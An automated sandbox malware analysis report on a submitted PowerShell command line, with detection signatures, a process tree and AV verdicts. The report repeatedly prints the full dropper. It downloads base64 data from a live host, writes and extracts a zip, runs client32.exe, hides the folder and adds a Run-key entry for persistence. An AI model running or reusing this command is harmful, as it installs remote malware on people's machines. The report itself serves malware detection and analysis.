Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=[Sy

Overview

General Information

Sample URL:http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-
Analysis ID:1415280
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • cmd.exe (PID: 3200 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wget.exe (PID: 5264 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::Ext
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::Ext
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::Ext
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1, CommandLine: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::Ext

Snort Signatures

No Snort rule has matched

Joe Sandbox Signatures

  • AV Detection
  • Networking
  • System Summary
  • Data Obfuscation
  • Malware Analysis System Evasion
  • HIPS / PFW / Operating System Protection Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://edulokam.comAvira URL Cloud: Label: malware
Source: https://edulokam.com/data.php?14831Avira URL Cloud: Label: malware
Source: https://edulokam.com/data.phpAvira URL Cloud: Label: malware
Source: https://edulokam.com/data.phpVirustotal: Detection: 16%Perma Link
Source: https://edulokam.comVirustotal: Detection: 16%Perma Link
Source: wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PT
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTB
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edulokam.com
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edulokam.com/data.php
Source: wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.drString found in binary or memory: https://edulokam.com/data.php?14831
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edulokam.comdulokam.com
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edulokam.comdulokam.comon%
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wget.exeSection loaded: rasadhlp.dllJump to behavior
Source: classification engineClassification label: mal68.win@4/1@0/0
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\Desktop\cmdline.outJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
Source: C:\Windows\SysWOW64\wget.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wget.exe wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" 